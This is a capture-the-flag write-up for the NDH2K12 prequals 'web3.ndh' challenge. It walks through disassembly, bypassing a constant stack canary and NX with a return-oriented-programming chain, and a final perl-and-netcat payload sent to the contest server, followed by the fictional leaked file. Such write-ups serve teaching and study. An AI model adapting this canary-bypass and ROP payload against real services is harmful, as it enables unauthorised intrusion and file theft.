NDH2K12 Prequals: web3.ndh writeup (port 4005)

Written by Franck Michea, 2012-03-25 00:41:00

This articles was originally written for LSE Blog with w4kfu. It was archived here. Check this awesome blog out too!

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
From: Piotr <piotr@megacortek.com>
To: LSE <lse@megacortek.com>
Subject: Another weird link
Attachments : web3.ndh

Thank you again for these informations! we have just credited your account
with $1700. Our spy thinks that Sciteek staff is aware about the mole
inside their building. He is trying to read a private file named
"sciteek-private.txt" located at sciteek.nuitduhack.com:4005. Please find
the .ndh attached, if you are sucessfull, reply with a message entitled
"complex remote service".

Of course, your efforts will be rewarded with $2500. Maybe you will find
pieces of informations about the mole.

Piotr

As before, we can easily execute this .ndh file in the VM we have to understand the behavior of the program, but this time we also had an IDA plugin to help us.

Program will reserve 0x200 bytes for the receveid buffer, and setup a canary on the stack at offset 0x200 avoiding stack based buffer overflow. But the canary is always the same value 0xbeef, this protection will be easy to bypass.

An another protection has been setup on this challenge, NX byte, instead of service 4004, we won't be able to execute code from our buffer. We will use ROP technics, to bypass it.

We figured out an excellent sub function (like in service 4000) "disp_file_content".

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
ROM:8201 disp_file_content:
ROM:8201                 PUSH           R1
ROM:8204                 PUSH           R2
ROM:8207                 PUSH           R3
ROM:820A                 PUSH           R4
ROM:820D                 PUSH           R5
ROM:8210                 MOVL           R1, 0
ROM:8215                 CALL           SYSCALL_OPEN
ROM:8219                 CMPL           R0, $FFFF
ROM:821E                 JNZ            file_valid
ROM:8221                 XOR            R0, R0
ROM:8225                 POP            R5
ROM:8227                 POP            R4
ROM:8229                 POP            R3
ROM:822B                 POP            R2
ROM:822D                 POP            R1
ROM:822F                 RET
ROM:8230 ; ---------------------------------------------------------------------------
ROM:8230
ROM:8230 file_valid:                             ; CODE XREF: disp_file_content+1D
ROM:8230                 MOV            R3, R0
ROM:8234                 MOVL           R1, 0
ROM:8239                 MOVL           R2, $2
ROM:823E                 CALL           SYSCALL_FSEEK
ROM:8242                 MOV            R4, R0
ROM:8246                 INC            R4
ROM:8248                 MOV            R0, R3
ROM:824C                 MOVL           R1, 0
ROM:8251                 MOVL           R2, 0
ROM:8256                 CALL           SYSCALL_FSEEK
ROM:825A                 SUB            SP, R4
ROM:825E                 MOV            R5, SP
ROM:8262                 MOV            R0, R3
ROM:8266                 MOV            R1, SP
ROM:826A                 MOV            R2, R4
ROM:826E                 CALL           SYSCALL_READ
ROM:8272                 ADD            R4, R5
ROM:8276                 DEC            R4
ROM:8278                 MOVBT          R4, 0
ROM:827C                 MOV            R0, R5
ROM:8280                 CALL           write_socket
ROM:8284                 MOVB           R0, 1
ROM:8288                 INC            R4
ROM:828A                 SUB            R4, R5
ROM:828E                 ADD            SP, R4
ROM:8292                 POP            R5
ROM:8294                 POP            R4
ROM:8296                 POP            R3
ROM:8298                 POP            R2
ROM:829A                 POP            R1
ROM:829C                 RET
ROM:829C ; End of function disp_file_content

Before calling this function we have to set R0 correctly to the file required file name ("sciteek-private.txt").

We will use these simple gadgets to change the value of R0 and quit program correctly:

1
2
3
4
5
6
ROM:80BD                 POP            R0
ROM:80BF                 RET

[...]

ROM:838C                 END

Scheme of exploitation looks like:

1
[file_name] [NULL_PADDING] [POP_R0;RET] [ADDR_BUFF] [disp_file_content] [END]

Here is the final exploit :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
perl -e 'print "sciteek-private.txt" . "\x00"x493 . "\xef\xbe" . "\xbd\x80" . "\xf4\x7b" . "\x01\x82" . "\x8c\x83"' | nc sciteek.nuitduhack.com 4005

Dear Patrick,

We found many evidences proving there is a mole inside our company who is selling confidential materials to our main competitor, Megacortek. We have very good reasons to believe that Walter Smith have sent some emails to a contact at Megacortek, containing confidential information.

However, these emails seems to have been encrypted and sometimes contain images or audio files which are apparently not related with our company or our business
, but one of them contains an archive with an explicit name.

We cannot stand this situation anymore, and we should take actions to make Mr Smith leave the company: we can fire this guy or why not call the FBI to handle this case as it should be.

Sincerely,

David Markham.